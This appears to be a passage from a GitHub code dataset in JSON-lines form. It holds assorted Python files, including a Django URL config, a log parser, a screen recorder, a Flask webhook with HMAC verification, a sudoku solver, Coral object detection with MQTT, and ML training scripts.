question_five_output_c\n\n# }}}\n\n# Do not edit any of the source code below this line\n\n\ndef run_question_five():\n    \"\"\"Run all of the sub-questions in question five.\"\"\"\n    # call the function for question five-a\n    output = question_five_a()\n    print(output)\n    # call the function for question five-b\n    output = question_five_b()\n    print(output)\n    # call the function for question five-c\n    output = question_five_c()\n    print(output)\n\n\nif __name__ == \"__main__\":\n    run_question_five()\n","repo_name":"Allegheny-Computer-Science-102-S2023/discrete-structures-executable-examination-three-starter","sub_path":"source/question_five.py","file_name":"question_five.py","file_ext":"py","file_size_in_byte":4509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"5576120472","text":"from django.conf.urls import url\r\nfrom certificate import views\r\n\r\nurlpatterns = [\r\n    url('add/', views.cer),\r\n    url('view/', views.view),\r\n    url('del/', views.delcert),\r\n    url('d/(?P<id>\\\\w+)', views.dele),  # capture-group name assumed as 'id'; the original name was lost\r\n]\r\n\r\n\r\n","repo_name":"Devadk13/Cert-Ease-A-digital-Certficate-request-and-approval-system","sub_path":"certificate/url.py","file_name":"url.py","file_ext":"py","file_size_in_byte":219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"30119026807","text":"from __future__ import annotations\n\nfrom typing import TYPE_CHECKING, Optional\n\nfrom dm.core.objects.status import DMStatus\nfrom utilities import *\n\nif TYPE_CHECKING:\n    from dm.core.contexts import AttackContext\n    from dm.core.objects.unit import DMUnit\n    from dm.core.game.game import DMGame\n################################################################################\n\n__all__ = (\"Frostbite\",)\n\n################################################################################\nclass Frostbite(DMStatus):\n\n    def __init__(\n        self,\n        game: DMGame,\n        parent: Optional[DMUnit] = None,\n        stacks: 
Optional[int] = 1\n    ):\n\n        super().__init__(\n            game,\n            parent,\n            _id=\"DBF-114\",\n            name=\"Frostbite\",\n            description=(\n                \"Damage received increases 5% per Slow possessed, and the effect \"\n                \"increases depending on Dull possessed. The stack count is halved \"\n                \"when receiving damage.\"\n            ),\n            stacks=stacks,\n            status_type=StatusType.Debuff,\n            base_effect=0.05\n        )\n\n################################################################################\n    def handle(self, ctx: AttackContext) -> None:\n        \"\"\"Called in every battle loop iteration.\"\"\"\n\n        # If we're defending\n        if self.owner == ctx.target:\n            # Increase damage:\n            ctx.amplify_pct(self.effect_value())\n            # Reduce stacks\n            self.reduce_stacks_by_half()\n\n################################################################################\n    @property\n    def base_effect(self) -> float:\n\n        dull = self.owner.get_status(\"Dull\")\n        if dull is None:\n            # without Dull, only the base 5% per Slow applies\n            return self._base_effect * self._base_scalar\n\n        return (self._base_effect * self._base_scalar) + (0.001 * dull.stacks)\n\n################################################################################\n    def effect_value(self) -> float:\n        \"\"\"The value of this status's effect.\n\n        Breakdown:\n        ----------\n        **effect = b * s**\n\n        In this function:\n\n        - b is the base adjustment.\n        - s is the number of Slow stacks.\n        \"\"\"\n\n        slow = self.owner.get_status(\"Slow\")\n        if slow is None:\n            return 0\n\n        return self.base_effect * slow.stacks\n\n################################################################################\n","repo_name":"AllegroVivo/DungeonDefense","sub_path":"dm/statuses/debuffs/Frostbite.py","file_name":"Frostbite.py","file_ext":"py","file_size_in_byte":2405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"26202292584","text":"\"\"\"\nGiven a web server log file, return the 10 most frequently requested files and\ntheir cumulative bytes transferred. Only include GET requests with HTTP 2xx\nresponses. 
Resolve ties by file name.\n\nLog format:\n- request timestamp\n- request line from client\n- HTTP status code\n- size of the returned object\n\nGiven this input data:\n\n    [29/Jan/1776:00:54:59 -0400] \"GET /img/filename1.gif HTTP/1.0\" 200 32511\n    [29/Jan/1776:00:55:04 -0400] \"GET /img/filename2.gif HTTP/1.0\" 200 3635\n    [29/Jan/1776:00:55:06 -0400] \"GET /img/filename2.gif HTTP/1.0\" 403 298\n    [29/Jan/1776:00:55:09 -0400] \"GET /img/filename2.gif HTTP/1.0\" 200 3635\n    [29/Jan/1776:00:55:18 -0400] \"GET /img/filename1.gif HTTP/1.0\" 200 32511\n    [29/Jan/1776:00:56:52 -0400] \"GET /img/filename2.gif HTTP/1.0\" 200 3635\n\nThe result should be:\n\n    /img/filename2.gif 10905\n    /img/filename1.gif 65022\n\n\"\"\"\n\ndef get_most_requested(log_file):\n    \"\"\" Prints the file path and cumulative bytes transferred in descending\n        order of request quantity, breaking ties by file name.\n\n    \"\"\"\n\n    if not log_file:\n        return None\n\n    with open(log_file) as log:\n        requests = [line.strip() for line in log.readlines()]\n\n    files = {}\n\n    for request in requests:\n        _, _, r_type, r_file, _, r_status, t_bytes = request.split()\n        # Ignore non-GET and unsuccessful requests\n        if r_type != '\"GET' or r_status[0] != '2':\n            continue\n        # Log each unique file; increment request count and add bytes\n        files[r_file] = files.get(r_file, [0, 0])\n        files[r_file][0] += 1  # Increment request count\n        files[r_file][1] += int(t_bytes)  # Increase total bytes\n\n    # Print up to 10 file names with total bytes, sorted by request count\n    # (descending), with ties broken by file name (ascending)\n    for item in sorted(files.items(), key=lambda f: (-f[1][0], f[0]))[:10]:\n        print(item[0], item[1][1])\n","repo_name":"meggangreen/code-challenges","sub_path":"parse_http_request_log.py","file_name":"parse_http_request_log.py","file_ext":"py","file_size_in_byte":1846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"29438123241","text":"\nimport pyautogui\nimport cv2\nimport numpy as np\n\n# Specify the resolution\nresolution = (1920, 1080)\n\n# Specify the video codec\ncodec = cv2.VideoWriter_fourcc(*\"XVID\")\n\n# Specify the name of the output file\nfilename = \"Recording.avi\"\n\n# Specify the frame rate\nfps = 60.0\n\n\nout = cv2.VideoWriter(filename, codec, fps, resolution)\n\ncv2.namedWindow(\"Live\", cv2.WINDOW_NORMAL)\n\n# Resize this window\ncv2.resizeWindow(\"Live\", 480, 270)\n\nwhile True:\n\n    img = pyautogui.screenshot()\n\n    frame = np.array(img)\n\n    frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n\n    out.write(frame)\n\n    cv2.imshow('Live', frame)\n\n    # Stop recording when we press 'q'\n    if cv2.waitKey(1) == ord('q'):\n        break\n\n# Release the video writer\nout.release()\n\n# Destroy all windows\ncv2.destroyAllWindows()\n","repo_name":"qwel-exe/Python-Screen-recorder","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"21275060005","text":"import turtle\n\n# fruit = \"apple\"\n# for idex in range(5):\n#     currentChar = fruit[idex]\n#     print(currentChar)\n\n# fruit = \"apple\"\n# for idx in range(len(fruit) - 1, 1, -1):\n#     print(fruit[idx])\n\n\n\n# fruit = \"dragons\"\n#\n# position = 0\n# while position < len(fruit):\n#     print(fruit[position])\n#     position = position + 1\n#\n#\n# s = \"python rocks\"\n# idx = 1\n# while idx < len(s):\n#     print(s[idx])\n#     idx = idx + 2\n\n\n# def removeVowels(s):\n#     vowels = \"aeiouAEIOU\"\n#     sWithoutVowels = \"\"\n#     for eachChar in s:\n#         if eachChar not in vowels:\n#             
sWithoutVowels = sWithoutVowels + eachChar\n#     return sWithoutVowels\n#\n#\n# print(removeVowels(\"This sentences has a few vowels, but not all\"))\n# print(removeVowels(\"aAbEefIijOopUus\"))\n#\n\n\n\n# s = \"ball\"\n# r = \"\"\n# for item in s:\n#     r = item.upper() + r\n# print(r)\n#\n\n\n# def applyRules(lhch):\n#     rhstr = \"\"\n#     if lhch == 'A':\n#         rhstr = 'B' # Rule 1\n#     elif lhch == 'B':\n#         rhstr = 'AB' # Rule 2\n#     else:\n#         rhstr = lhch # no rules apply so keep the character\n#\n#     return rhstr\n\n\n# def processString(oldStr):\n#     newstr = \"\"\n#     for ch in oldStr:\n#         newstr = newstr + applyRules(ch)\n#\n#     return newstr\n#\n#\n# def createLSystem(numIters, axiom):\n#     startString = axiom\n#     endString = \"\"\n#     for i in range(numIters):\n#         endString = processString(startString)\n#         startString = endString\n#\n#     return endString\n#\n# print(createLSystem(4, \"A\"))\n\n# Looping and counting\n\ndef count(text, aChar):\n    lettercount = 0\n    for c in text:\n        if c == aChar:\n            lettercount = lettercount + 1\n    return lettercount\n\nprint(count(\"afunnybunny\", \"a\"))\n\n\n# To find the locations of the second or third occurrence of a character in a string,\n# we can modify the find function, adding a third parameter for the starting position in the search string:\n# Save & Run\n\ndef find2(astring, achar, start):\n    \"\"\"\n    Find and return the index of achar in astring.\n    Return -1 if achar does not occur in astring.\n    \"\"\"\n    ix = start\n    found = False\n    while ix < len(astring) and not found:\n        if astring[ix] == achar:\n            found = True\n        else:\n            ix = ix + 1\n    if found:\n        return ix\n    else:\n        return -1\n\nprint(find2('banana', 'a', 2))\n\n# handy character classes exposed by the string module\n\nimport string\nprint(string.ascii_lowercase)\nprint(string.ascii_uppercase)\nprint(string.digits)\nprint(string.punctuation)","repo_name":"ahmermalik/classWork","sub_path":"Week1/exerciseselfstudy.py","file_name":"exerciseselfstudy.py","file_ext":"py","file_size_in_byte":2514,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"71887657363","text":"import collections\nimport hashlib\nimport hmac\n\nimport six\nfrom flask import abort, request\n\n\nclass Webhook(object):\n    \"\"\"\n    Create a webhook endpoint on a given Flask app\n\n    :param app: Flask app running in the project\n    :param endpoint: webhook URL endpoint\n    :param secret: (optional) Secret used to authenticate GitHub's request\n    \"\"\"\n\n    def __init__(self, app, endpoint='/webhooks', secret=None):\n        app.add_url_rule(rule=endpoint,\n                         endpoint=endpoint,\n                         view_func=self._webhooks_view,\n                         methods=['POST'])\n\n        self._registered_hooks = collections.defaultdict(list)\n        if secret is not None and not isinstance(secret, six.binary_type):\n            secret = secret.encode('utf-8')\n        self._secret = secret\n\n    def hook(self, event_type):\n        \"\"\"\n        Register a hook function via a decorator; multiple hooks can be\n        registered for the same event type\n\n        :param event_type: Event name from GitHub event_names list.\n        :type event_type: str\n        \"\"\"\n\n        def decorator(func):\n            self._registered_hooks[event_type].append(func)\n            return func\n\n        return decorator\n\n    def _webhooks_view(self):\n        \"\"\"\n        Main function invoked by Flask once the endpoint is reached\n        \"\"\"\n\n        digest = None\n\n        if self._secret:\n            digest = hmac.new(self._secret, request.data, hashlib.sha1).hexdigest()\n\n        if digest is not None:\n            signature_comp = self._get_header('X-Hub-Signature').split('=', 1)\n            if not isinstance(digest, six.text_type):\n                digest = six.text_type(digest)\n
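\n            # hmac.compare_digest runs in constant time, avoiding timing side-channels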
\n            if not hmac.compare_digest(signature_comp[1], digest):\n                abort(400, 'Invalid signature')\n\n        data = request.get_json()\n        if data is None:\n            abort(400, 'Request body must contain json')\n\n        event_type = self._get_header('X-Github-Event')\n\n        # Dispatch all hook functions\n        for hook in self._registered_hooks.get(event_type, []):\n            hook(data)\n\n        # Return 202 (Accepted), since multiple hooks may have been triggered\n        return 'OK', 202\n\n    @staticmethod\n    def _get_header(key):\n        \"\"\"Get a header value for the given key\n\n        :param key: Key to search for\n        \"\"\"\n\n        try:\n            return request.headers[key]\n        except KeyError:\n            abort(400, 'Missing header: ' + key)\n","repo_name":"carlosescura/github-bot-python","sub_path":"github_bot/helpers/github_webhook/webhook.py","file_name":"webhook.py","file_ext":"py","file_size_in_byte":2454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"25063338672","text":"import bpy\nfrom ..base_node import CrowdManager_BaseNode\n\nclass CrowdManager_CrowdNode(bpy.types.Node, CrowdManager_BaseNode):\n    bl_idname = 'CrowdManager_CrowdNode'\n    bl_label = 'Crowd'\n\n    node_types = [\"crowd\"]\n\n    settings : bpy.props.EnumProperty(\n        items=[\n            (\"obj\", \"Object\", \"\"),\n            (\"col\", \"Collection\", \"\")\n        ],\n        update=CrowdManager_BaseNode.property_changed\n    )\n\n    def init(self, context):\n        super().__init__()\n        self.inputs.new('CrowdManager_AgentSocketType', \"Agents\")\n        self.inputs.new('CrowdManager_ObjectSocketType', \"Object\")\n        self.inputs.new('CrowdManager_CollectionSocketType', \"Collection\")\n        self.hide_links()\n\n    def draw_buttons(self, context, layout):\n        layout.prop(self, \"settings\", text=\"\")\n\n    def hide_links(self):\n        if self.settings == \"obj\":\n            self.inputs[1].hide = False\n            self.inputs[1].enabled = True\n            self.inputs[2].hide = True\n            self.inputs[2].enabled = False\n        elif self.settings == \"col\":\n            self.inputs[1].hide = True\n            self.inputs[1].enabled = False\n            self.inputs[2].hide = False\n            self.inputs[2].enabled = True\n\n    def edit(self):\n        self.hide_links()\n        crowd_collection = getCrowdCollection()\n        node0 = self.get_input_node(0)\n        node1 = self.get_input_node(1)\n        node2 = self.get_input_node(2)\n\n        if len(crowd_collection.objects) > 0:\n            for obj in crowd_collection.objects:\n                bpy.data.objects.remove(obj, do_unlink=True)\n\n        if node0 is not None:\n            ob = []\n            agents = node0.outputs[0].agents\n\n            if self.settings == \"obj\":\n                if node1 is not None and node1.outputs[0].object is not None:\n                    ob = [node1.outputs[0].object]\n            elif self.settings == \"col\":\n                if node2 is not None and node2.outputs[0].collection is not None:\n                    for obj in node2.outputs[0].collection.objects:\n                        ob.append(obj)\n\n            if (self.settings == \"obj\" and node1 is not None) or (self.settings == \"col\" and node2 is not None):\n                if len(agents) > 0 and len(ob) > 0:\n                    obidx = 0\n                    for idx, agent in enumerate(agents):\n                        cur_ob = ob[obidx]\n                        link = bpy.data.objects.get(f\"AGENT_{idx}\" + \"_\" + cur_ob.name)\n                        if link is None:\n                            link = bpy.data.objects.new(f\"AGENT_{idx}\" + \"_\" + cur_ob.name, cur_ob.data)\n\n                        addInstanceToCollection(link, crowd_collection, idx)\n\n                        if agent.simulated:\n                            for i, s in enumerate(agent.sim):\n                                link.location = s.location\n                                link.rotation_euler = s.rotation\n                                link.keyframe_insert(data_path=\"location\", frame = i + agent.sim_start)\n                                link.keyframe_insert(data_path=\"rotation_euler\", frame = i + agent.sim_start)\n                        else:\n                            link.location = agent.sim[0].location\n                            link.rotation_euler = 
agent.sim[0].rotation\n\n                        obidx += 1\n\n                        if obidx >= len(ob):\n                            obidx = 0\n        else:\n            if len(crowd_collection.objects) > 0:\n                for a in crowd_collection.objects:\n                    bpy.data.objects.remove(a, do_unlink=True)\n\n        self.linked_update()\n\ndef addInstanceToCollection(instance, col, idx):\n    if len(col.objects) > 0:\n        for a in col.objects:\n            if f\"AGENT_{idx}\" in a.name:\n                bpy.data.objects.remove(a, do_unlink=True)\n                break\n\n    col.objects.link(instance)\n\ndef getCrowdCollection():\n    collection = bpy.data.collections.get(\"GRP_CrowdCollection\")\n\n    if collection is None:\n        collection = bpy.data.collections.new(\"GRP_CrowdCollection\")\n        bpy.context.scene.collection.children.link(collection)\n\n    return collection","repo_name":"Christopher-Hosken/crowd_manager","sub_path":"nodes/crowd/crowd_node.py","file_name":"crowd_node.py","file_ext":"py","file_size_in_byte":4317,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"}
+{"seq_id":"707096732","text":"import copy\n\nclass Sudoku:\n    def __init__(self, meno_suboru):\n        self.tab = []\n        with open(meno_suboru, 'r') as fp:\n            for riadok in fp:\n                r = []\n                for j in riadok.strip():\n                    if j != ' ':\n                        try:\n                            j = int(j)\n                        except ValueError:\n                            pass\n                        r.append(j)\n                self.tab.append(r)\n        print(\"SUDOKU TASK:\")\n        print(self.__str__())\n\n    def __str__(self):\n        vysl = ''\n        for r in self.tab:\n            for j in r:\n                vysl += str(j) + ' '\n            vysl += '\\n'\n        return vysl\n\n    def urob(self):\n        item_len_0, item_len_1 = 0, 0\n        tab1 = copy.deepcopy(self.tab)\n        for row_number in range(0, 9):\n            row = self.get_row(row_number)\n            for column_number in range(0, 9):\n                if self.tab[row_number][column_number] == '.':\n                    column = self.get_column(column_number)\n                    box = self.get_box(column_number, row_number)\n                    possibilities = set(range(1, 10))\n                    poss = possibilities - row - column - box\n                    if len(poss) == 1:\n                        tab1[row_number][column_number] = poss\n                        item_len_1 += 1\n                    elif len(poss) == 0:\n                        item_len_0 += 1\n\n        self.tab = tab1\n        if item_len_0 > 0:\n            return -1\n        return item_len_1\n\n    def get_column(self, column_number):\n        return {i[column_number] for i in self.tab if i[column_number] != '.'}\n\n    def get_row(self, row_number):\n        return {i for i in self.tab[row_number] if i != '.'}\n\n    def get_box(self, column_number, row_number):\n        start_row = row_number//3 * 3\n        start_column = column_number//3 * 3\n        box = []\n        for i in range(start_row, start_row+3):\n            box.extend(self.tab[i][start_column:start_column+3])\n        return set(box)\n\n    def nahrad(self):\n        for row in range(9):\n            for column in range(9):\n                if isinstance(self.tab[row][column], set) and len(self.tab[row][column]) == 1:\n                    # a one-element set like {5} prints as \"{5}\"; strip the braces to recover the digit\n                    self.tab[row][column] = int(str(self.tab[row][column]).strip('{}'))\n                elif isinstance(self.tab[row][column], set):\n                    self.tab[row][column] = '.'
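  # unresolved cells go back to '.' so the next pass retries them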
\n\n\n    def ries(self):\n        condition = True\n        while condition:\n            sud = self.urob()\n            self.nahrad()\n            if self.pocet_nezaplnenych() == 0:\n                print(\"SUDOKU solution:\")\n                print(self.__str__())\n                condition = False\n                #exit()\n\n            if sud == -1 or sud == 0:\n                print(\"SUDOKU doesn't have a solution (or the solver cannot make progress)\")\n                print(self.__str__())\n                condition = False\n                #exit()\n\n    def pocet_nezaplnenych(self):\n        not_filled = 0\n        for i in self.tab:\n            not_filled += i.count('.')\n        return not_filled\n\ns1 = Sudoku('sudoku.txt')\ns1.ries()\n\ns2 = Sudoku('sudoku1.txt')\ns2.ries()","repo_name":"zorell11/python","sub_path":"Sudoku/sudoku.py","file_name":"sudoku.py","file_ext":"py","file_size_in_byte":3265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"18685553028","text":"# import the necessary packages\nfrom edgetpu.detection.engine import DetectionEngine\nfrom imutils.video import VideoStream\nfrom PIL import Image\nimport argparse\nimport imutils\nimport time\nimport cv2\n\nimport paho.mqtt.publish as publish\n\nMQTT_SERVER = \"localhost\"\nMQTT_PATH = \"test_channel\"\n\n# construct the argument parser and parse the arguments\nap = argparse.ArgumentParser()\nap.add_argument(\"-m\", \"--model\", required=True,\n    help=\"path to TensorFlow Lite object detection model\")\nap.add_argument(\"-l\", \"--labels\", required=True,\n    help=\"path to labels file\")\nap.add_argument(\"-c\", \"--confidence\", type=float, default=0.3,\n    help=\"minimum probability to filter weak detections\")\nargs = vars(ap.parse_args())\n\n# initialize the labels dictionary\nprint(\"[INFO] parsing class labels...\")\nlabels = {}\n\n# loop over the class labels file\nfor row in open(args[\"labels\"]):\n    # unpack the row and update the labels dictionary\n    (classID, label) = row.strip().split(maxsplit=1)\n    labels[int(classID)] = label.strip()\n\n# load the Google Coral object detection model\nprint(\"[INFO] loading Coral model...\")\nmodel = DetectionEngine(args[\"model\"])\n\n# initialize the video stream and allow the camera sensor to warm up\nprint(\"[INFO] starting video stream...\")\nvs = VideoStream(src=0).start()\n#vs = VideoStream(usePiCamera=False).start()\ntime.sleep(2.0)\n\n# loop over the frames from the video stream\nwhile True:\n    # grab the frame from the threaded video stream and resize it\n    # to have a maximum width of 500 pixels\n    frame = vs.read()\n    frame = imutils.resize(frame, width=500)\n    orig = frame.copy()\n\n    # prepare the frame for object detection by converting (1) it\n    # from BGR to RGB channel ordering and then (2) from a NumPy\n    # array to PIL image format\n    frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n    frame = Image.fromarray(frame)\n\n    # make predictions on the input frame\n    start = time.time()\n    results = model.DetectWithImage(frame, threshold=args[\"confidence\"],\n        keep_aspect_ratio=True, relative_coord=False)\n    end = time.time()\n    # loop over the results\n    for r in results:\n        # extract the bounding box and predicted class label\n        box = r.bounding_box.flatten().astype(\"int\")\n        (startX, startY, endX, endY) = box\n        label = labels[r.label_id]\n        publish.single(MQTT_PATH, str(startX), hostname=MQTT_SERVER)\n\n        # draw the bounding box and label on the image\n        cv2.rectangle(orig, (startX, startY), (endX, endY),\n            (0, 255, 0), 2)\n        y = startY - 15 if startY - 15 > 15 else startY + 15\n        text = \"{}: {:.2f}%\".format(label, r.score * 100)\n        cv2.putText(orig, text, (startX, y),\n            cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0), 2)\n\n    # show the output 
frame and wait for a key press\n cv2.imshow(\"Frame\", orig)\n key = cv2.waitKey(1) & 0xFF\n \n # if the `q` key was pressed, break from the loop\n if key == ord(\"q\"):\n break\n \n# do a bit of cleanup\ncv2.destroyAllWindows()\nvs.stop()\n\n\n","repo_name":"SaralTayal123/Object-Finding-Rover","sub_path":"raspberry_pi_packet_serial/obj2.py","file_name":"obj2.py","file_ext":"py","file_size_in_byte":3038,"program_lang":"python","lang":"en","doc_type":"code","stars":62,"dataset":"github-code","pt":"3"} +{"seq_id":"17283075798","text":"from corextopic import corextopic as ct\nimport pickle\n\n\nclass CorexModel:\n def __init__(self, config, preprocessor, load=False, seed=True):\n self.model_path = config.paths.save_model_path\n if load:\n self.model = pickle.load(open(self.model_path, \"rb\"))\n else:\n self.model = ct.Corex(n_hidden=config.model.num_topics,\n seed=config.model.random_state)\n\n self.vocab = preprocessor.vocab\n self.seed_topics = None\n if seed:\n self.seed_topics = preprocessor.seed_topics\n\n def save(self):\n with open(self.model_path, 'wb') as output:\n pickle.dump(self.model, output, pickle.HIGHEST_PROTOCOL)\n","repo_name":"junronglau/product-defects-mining","sub_path":"models/corex_model.py","file_name":"corex_model.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"20323832890","text":"import logging\nimport math\nimport os\nimport time\nimport torch.nn as nn\nimport argparse\nfrom tqdm import tqdm\nimport shutil\nimport pdb\nimport torch\nimport matplotlib.pyplot as plt\nfrom skimage.io import imread\n\nimport utils\nfrom utils import setup_logger\nfrom model import build_model\nfrom trainer import Trainer\nfrom dataset import make_dataloader\nfrom optim import make_optimizer, make_scheduler\n\nfrom utils import AverageMeter\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('-c', '--config_file', type=str,\n default='configs/config.json',\n help='the path to the training config')\n parser.add_argument('-t', '--test', action='store_true',\n default=False, help='Model test')\n args = parser.parse_args()\n return args\n\n\ndef main():\n args = parse_args()\n if args.test:\n test(args)\n else:\n train(args)\n\n\ndef train(args):\n cfg = utils.process_cfg(args.config_file)\n output_dir = os.path.join(cfg.exp_base, cfg.exp_name, str(time.time()))\n cfg.output_dir = output_dir\n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n shutil.copy(args.config_file, cfg.output_dir)\n setup_logger(output_dir)\n logger = logging.getLogger()\n logger.info('Train with config:\\n{}'.format(cfg))\n\n train_dl = make_dataloader(cfg, 'train')\n val_dl = make_dataloader(cfg, 'validation')\n\n model = build_model(cfg)\n logger.info(\"model architecture:\")\n logger.info(model)\n\n optimizer = make_optimizer(cfg, model)\n\n scheduler = make_scheduler(cfg, optimizer)\n\n loss_func = nn.CrossEntropyLoss()\n\n trainer = Trainer(cfg, model, train_dl, val_dl, optimizer, scheduler, loss_func)\n\n trainer.train()\n\n\ndef test(args):\n cfg = utils.process_cfg(args.config_file)\n test_dl = make_dataloader(cfg, 'test')\n model = build_model(cfg)\n model.load_state_dict(torch.load(cfg.test.model_path))\n model = model.to(cfg.device)\n loss_func = nn.CrossEntropyLoss()\n device = cfg.device\n model.eval()\n loss_avg = AverageMeter()\n stats = torch.zeros((2, 2)) # [[tp, fp], [fn, tn]]\n fp_paths, fn_paths = [], []\n for data, label, paths in tqdm(test_dl):\n 
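# accumulate the loss and a 2x2 confusion matrix over the test set\n        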
data, label = data.to(device), label.to(device)\n        probs = model(data)\n        loss = loss_func(probs, label)\n        preds = torch.argmax(probs, dim=1)\n        preds = preds.detach().cpu()\n        label = label.detach().cpu()\n        # the outer product of [pred, 1-pred] with [label, 1-label] sums to the\n        # batch confusion matrix [[tp, fp], [fn, tn]]\n        confuse_matrix = \\\n            torch.matmul(torch.stack([preds, 1 - preds], dim=0), torch.stack([label, 1 - label], dim=1))\n        stats += confuse_matrix\n        fp_indices = torch.nonzero(torch.logical_and(1 - label, preds), as_tuple=True)[0]\n        fp_paths.extend([paths[i] for i in fp_indices])\n        fn_indices = torch.nonzero(torch.logical_and(1 - preds, label), as_tuple=True)[0]\n        fn_paths.extend([paths[i] for i in fn_indices])\n        loss_avg.update(loss.detach().cpu().item(), len(data))\n    loss = loss_avg.avg\n    print('loss:\\n {}'.format(loss))\n    acc = (stats[0, 0] + stats[1, 1]) / torch.sum(stats)\n    print(\"acc:\\n {}\".format(acc))\n    print(\"[[tp, fp], [fn, tn]]:\\n {}\".format(stats))\n\n    fp_pic_num = min(len(fp_paths), 10)\n    fn_pic_num = min(len(fn_paths), 10)\n    fig = plt.figure()\n    for i in range(fp_pic_num):\n        plt.subplot(4, 5, i + 1)\n        plt.imshow(imread(fp_paths[i]))\n    for i in range(fn_pic_num):\n        plt.subplot(4, 5, i + 11)\n        plt.imshow(imread(fn_paths[i]))\n    plt.show()\n\n\nif __name__ == '__main__':\n    main()\n\n","repo_name":"CeeZh/wear-mask-correctly-or-not","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"39173273592","text":"\"\"\"\n * Universidad del Valle de Guatemala\n * (CC3039) Modeling and Simulation\n * Final Project - Football Results Prediction\n *\n * Team members:\n * - Pedro Pablo Arriola Jiménez (20188)\n * - Marco Pablo Orozco Saravia (20857)\n * - Santiago Taracena Puga (20017)\n\"\"\"\n\nclass Team(object):\n    def __init__(self, team_data):\n        self.name = team_data[\"name\"]\n        self.goals_per_game = team_data[\"goals_per_game\"]\n        self.shots_on_target = team_data[\"shots_on_target\"]\n        self.shots_on_target_accuracy = team_data[\"shots_on_target_accuracy\"]\n        self.penalties = team_data[\"penalties\"]\n        self.penalty_accuracy = team_data[\"penalty_accuracy\"]\n        self.corners = team_data[\"corners\"]\n        self.fouls_received_per_game = team_data[\"fouls_received_per_game\"]\n        self.offsides_per_game = team_data[\"offsides_per_game\"]\n        self.goals_per_game_received = team_data[\"goals_per_game_received\"]\n        self.shots_on_target_received = team_data[\"shots_on_target_received\"]\n        self.fouls_committed_per_game = team_data[\"fouls_committed_per_game\"]\n        self.recoveries_per_game = team_data[\"recoveries_per_game\"]\n        self.cut_passes_per_game = team_data[\"cut_passes_per_game\"]\n        self.entries_per_game = team_data[\"entries_per_game\"]\n        self.clears_per_game = team_data[\"clears_per_game\"]\n        self.cards_per_game = team_data[\"cards_per_game\"]\n        self.yellow_cards_per_card = team_data[\"yellow_cards_per_card\"]\n        self.red_cards_per_card = team_data[\"red_cards_per_card\"]\n","repo_name":"SantiagoTaracena01/liga-results","sub_path":"src/utils/classes/team.py","file_name":"team.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"34572198067","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: raphael.bacher@gipsa-lab.fr\n\"\"\"\n\nimport logging\n\nimport numpy as np\nimport scipy.signal as ssl\nimport yaml\nfrom scipy.ndimage import median_filter\n\nimport astropy.units as units\nfrom astropy.table import Table\nfrom mpdaf.obj import Cube, 
Image, Spectrum\nfrom mpdaf.sdetect import Source\n\nfrom .parameters import Params\nfrom .regularization import regulDeblendFunc\nfrom .utils import (\n    convertIntensityMap,\n    extractHST,\n    generatePSF_HST,\n    getBlurKernel,\n    getMainSupport,\n    load_filter,\n)\nfrom .version import version as __version__\n\n__all__ = ('Deblending', 'deblendGroup')\n\n\ndef deblendGroup(group, outfile, conf, imLabel, timestamp):\n    \"\"\"Deblend a given group.\"\"\"\n    logger = logging.getLogger(__name__)\n    logger.debug('group %d, start, %d sources', group.ID, group.nbSources)\n    debl = Deblending(group, conf, imLabel)\n    logger.debug('group %d, createIntensityMap', group.ID)\n    debl.createIntensityMap()\n    logger.debug('group %d, findSources', group.ID)\n    debl.findSources()\n    logger.debug('group %d, write', group.ID)\n    debl.write(outfile, conf, timestamp)\n    logger.debug('group %d, done', group.ID)\n\n\nclass Deblending:\n    \"\"\"\n    Main class for the deblending process.\n\n    Parameters\n    ----------\n    group :\n        The group of blended sources to process.\n    conf : dict\n        The settings dict.\n    imLabel : array\n        Label image of the segmentation groups.\n\n    The number of MUSE spectral bins used for computation is taken from the\n    ``nBands`` parameter; the MUSE FSF is assumed constant within a bin.\n\n    Attributes\n    ----------\n    estimatedCube : numpy.ndarray\n        Estimated cube\n    estimatedCubeCont : numpy.ndarray\n        Estimated cube continuum\n    residuals : numpy.ndarray\n        The cube of residuals (datacube - estimated cube)\n    sources: list\n        list of estimated spectra\n    varSources: list\n        list of variances of estimated spectra\n    listIntensityMap (HR, LRConvol) : list\n        list of Abundance Map of each object detected, at high resolution,\n        and after convolution and subsampling\n\n    \"\"\"\n\n    def __init__(self, group, conf, imLabel):\n        self.params = Params(**conf.get('params', {}))\n        self.group = group\n\n        cube = Cube(conf['cube'])\n        self.cube = cube = cube[:, group.region.sy, group.region.sx]\n        im = cube[0]\n        self.imLabel = Image(data=imLabel[group.region.sy, group.region.sx],\n                             wcs=im.wcs.copy(), copy=False)\n\n        self.segmap = (extractHST(Image(conf['segmap']), im, integer_mode=True)\n                       .data.filled(0))\n\n        # List of all HST ids in the segmap\n        listHST_ID = np.unique(self.segmap)\n        listHST_ID = 